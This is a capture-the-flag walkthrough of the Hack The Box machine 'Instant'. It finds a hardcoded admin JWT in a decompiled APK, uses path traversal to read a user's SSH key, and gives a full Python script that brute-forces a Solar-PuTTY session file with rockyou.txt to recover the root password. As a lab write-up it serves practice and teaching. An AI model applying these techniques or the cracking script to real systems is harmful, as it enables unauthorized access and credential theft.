Instant (HTB)

I said NOW.

---

Intro.

Hi fellos today we have yet another HTB season machines let's get right into it.

---

Enumeration.

Port scan.

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 31:83:eb:9f:15:f8:40:a5:04:9c:cb:3f:f6:ec:49:76 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMM6fK04LJ4jNNL950Ft7YHPO9NKONYVCbau/+tQKoy3u7J9d8xw2sJaajQGLqTvyWMolbN3fKzp7t/s/ZMiZNo=
|   256 6f:66:03:47:0e:8a:e0:03:97:67:5b:41:cf:e2:c7:c7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL+zjgyGvnf4lMAlvdgVHlwHd+/U4NcThn1bx5/4DZYY
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.58
|_http-title: Instant Wallet
| http-methods:
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.58 (Ubuntu)

So classic we have HTTP and SSH.

Let's enum HTTP.

So after long time of enumeration including fuzzing, subdomain enum, directory search it turns out it was way simpler. So first thing come to my mind when i visit the website is to download the file i download it, it was .apk file.

An APK (Android Package) file is a package format used by Android to distribute and install mobile apps.

then i though that the main object was there so i decopress the files.

at first glance i though nothing is in here is just a rabbit whole so i came back to the website and i did all the enumeration and no good. https://forum.hackthebox.com/t/official-instant-discussion/327960 then i navigate to the offial discussion and i saw one of the people says search more in the apk file so that's what i did and i find what i was looking for.

two subdomains exist under res/xml/network_security_config.xml.

So after some time testing with diffrent username password trying to get access to the admin enpoints.

so i though that in the code they must maybe have some creds to be able to access these endpoints so i start search for creds but i did not find 🤡. But what have i found ??.

Path traversal

```
eyJhbGciOiJIUzI1NiIsInR5c.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA
```

Was a bearer token which is jwt web token.

JWT tokens are a way for the server to keep track the user login state and his privilage within the web application you can thing of it as a way to not make the user login every time they try to access some place in the website.

so i though it maybe expired but i tried it anyway.

The jwt token exist in the file named : AdminActivities.smali. Which appear to be a testing unit.

So after i got the admin token i start looking around and the most intresting things was the logs and the users. the users only contain users sure. But the logs contains logs file regarding the endpoints.

Let's first see the avaliable logs and then tried to read them.

So we can see the file name and the path that files exist in, So let's read it.

The most importan thing in this image is that it uses query parameters to get the file name could it be LFI or Path traversal ???.

Emphasizing the Difference between LFI and Path Traversal

Local File Inclusion (LFI) occurs when an application improperly handles user input for file inclusion. Typically, this happens when an application accepts a file path from the user to include or display within a webpage, but does not properly restrict or validate the path. In this scenario, attackers can specify any file path on the server, causing the application to load and sometimes execute files from anywhere on the system. In PHP, for example, functions like include and require are often at risk if used insecurely.

Path Traversal, also known as Directory Traversal, is similar to LFI but has a different focus. Here, instead of including files into the application, the attacker tries to directly access restricted files by manipulating the file path. By using traversal sequences (like ../), attackers can navigate to directories outside the intended file path and access sensitive files that weren’t meant to be exposed

So i tried both and the one that it works was the path traversal.

shell as shirohige.

So with all thing information we could access her ssh key.

And the pain was in cleaning this ssh key but we did it.

Do not forgot to change the permission of the key to 600.

chmod 600 <filename>

Shell as Root.

So from there i just did some basic enumeration and i found solar-putty session file in the opt directory.

Solar putty is just enhanced version of putty which is used commonly to connect to ssh on windows.

And a bit more search i found that this could be crackable. thanks to https://xtromera.github.io/

I was able to crack it using the following python code.

import base64
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend

def decrypt(passphrase, ciphertext):
    try:
        # Decode the base64 encoded ciphertext
        array = base64.b64decode(ciphertext)
        salt = array[:24]
        iv = array[24:32]
        encrypted_data = array[48:]

        # Derive the key from the passphrase using PBKDF2
        kdf = PBKDF2HMAC(
            algorithm=hashes.SHA1(),
            length=24,  # Triple DES key size
            salt=salt,
            iterations=1000,
            backend=default_backend()
        )
        key = kdf.derive(passphrase.encode())

        # Create the cipher and decrypt the data
        cipher = Cipher(algorithms.TripleDES(key), modes.CBC(iv), backend=default_backend())
        decryptor = cipher.decryptor()

        decrypted_data = decryptor.update(encrypted_data) + decryptor.finalize()

        data = ''.join(chr(c) for c in decrypted_data if chr(c).isascii())
        return data

    except Exception as e:
        print(f'Error: {e}')


with open('./sessions-backup.dat') as f:
    cipher = f.read()

with open('../../Downloads/rockyou.txt') as passwords:
    for i, password in enumerate(passwords):
        password = password.strip()
        decrypted = decrypt(password, cipher)
        print(f'[{i}] {password=}', end='\r')
        if 'Credentials' in decrypted:
            print('\r', i, password)
            print()
            print(decrypted)
            break

and it turns out that it give us the root password now we just need to login as root.

In order to crack it you just need to transfer the file using python3 -m http.server to your machine

Ending.

at this end this machine was one of the best machines that i ever played due to the ideas that it had from the inital access to the root eveything is new. Great work from HTB actully.